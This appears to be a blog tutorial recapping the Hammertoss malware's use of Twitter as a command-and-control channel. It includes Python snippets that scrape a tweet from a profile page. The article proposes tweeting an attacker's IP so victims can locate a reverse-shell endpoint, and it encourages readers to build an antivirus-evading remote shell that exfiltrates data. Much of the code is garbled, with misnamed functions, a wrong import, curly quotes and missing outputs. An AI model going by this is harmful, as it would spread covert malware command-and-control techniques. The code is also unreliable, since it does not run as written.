How Did the Russian Abuse Twitter as C&C in Hammertoss Malware? Python Answers 2023
In this article we will learn about How Did the Russian Abuse Twitter as C&C in Hammertoss Malware? Python Answers.
How Did the Russian Abuse Twitter as C&C in Hammertoss Malware?
Today we’re going to recap a technique used by a recent, sophisticated and hard-to-trace Russian malware called Hammertoss, the creators of which exploited several well-known sites like Twitter and Github to defeat modern firewalls and torture anyone who follows their tracks.
In short, instead of getting a direct backlink back to the C&C server similar to what traditional malware does, this clever malware will hop between third-party servers to do its malicious activity, please take two minutes to watch this [https:// www. fireeye.com/blog/threat-research/2015/07/hammertoss_stealthy.html/] short explainer video from FireEye so you get a quick overview of how the malware works.
Okay, so the first stage of Hammertoss was to connect to Twitter and look for a hacked tweet that contains the URL for the image and the hashtag as part of the encryption key. Technically, you don’t need to be logged into Twitter to parse someone’s tweet, so in this case we just need to find out the URL of the navigation account and the HTML tags that contain the actual tweet. Keep in mind that you can add additional Twitter accounts to hide the original one (which belongs to the hacker).
Related article :Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
Obviously, you should never have your personal account when doing things like this; so I created a new account with my name on it and here is a link to my Twitter home page
Now I tweeted from my Kali machine saying “Hello from Kali python” then I logged out, at this point once we click on the above url we should see something similar to this output.
Now using your browser you can view the HTML source code of this page, in Chrome just do a right-click anywhere on the page and select “View page source” or Ctrl+U for short, in the HTML if we search for our tweet, we will get the below HTML line:-
| <meta name=”description” content=”The latest Tweets from Hussam Khrais (@HussamKhrais): "Hello from kali python"”> |
So technically if we code a simple script that goes to https://twitter.com/HussamKhrais
And load the HTML page, then inside the HTML, if we looked for a meta tag called name that has a description value, and we asked for the content value, then we should be able to grab our tweet.
Let’s convert this action into code:-
- from BeautifulSoup import BeautifulSoup as soup #1
- import urllib #2
- html = urllib.urlopen(‘https://twitter.com/HussamKhrais’).read() #3
- soup = soups(html) #4
- x = soup.find(“meta”, {“name”:“description”})[‘content’] #5
- print x
6
- Import the soup function from the BeautifulSoup library, we will use this function to search for HTML tags
- Import the urllib that will be used to navigate to our twitter page and get the HTML for us
- Go to my twitter homepage HussamKhrais stores the HTML page in an HTML variable
- We pass it to the soup function so we can parse it
- Here we are looking for HTML meta tags
- Print the result
The output for running the script would be
At this point, since we only care about the string being between quotes, we can filter it out using a regular expression, and that’s exactly what the script below will do for us
- import d
- filter = re.findall(r'”(.*?)”‘,x)
- tweet = filter[0]
- print tweet
- The last function grabs the string between ” and stores it in a list data type called filter. Finally, we print the exact tweet.
After assembling all the parts of the script, we got the result below
Now think about it for a second, can we use Twitter to replace DDNS? What happens if we replace “Hello from Kali Python” with the attacker’s public IP, and every time the attacker’s IP changes, all he has to do is send a tweet with the new IP to get a backlink for his victim!
After reading this article, do you think you can code a complete AV-less remote shell in Python and exfiltrate data without having a single direct connection to your target? Please share your thoughts.
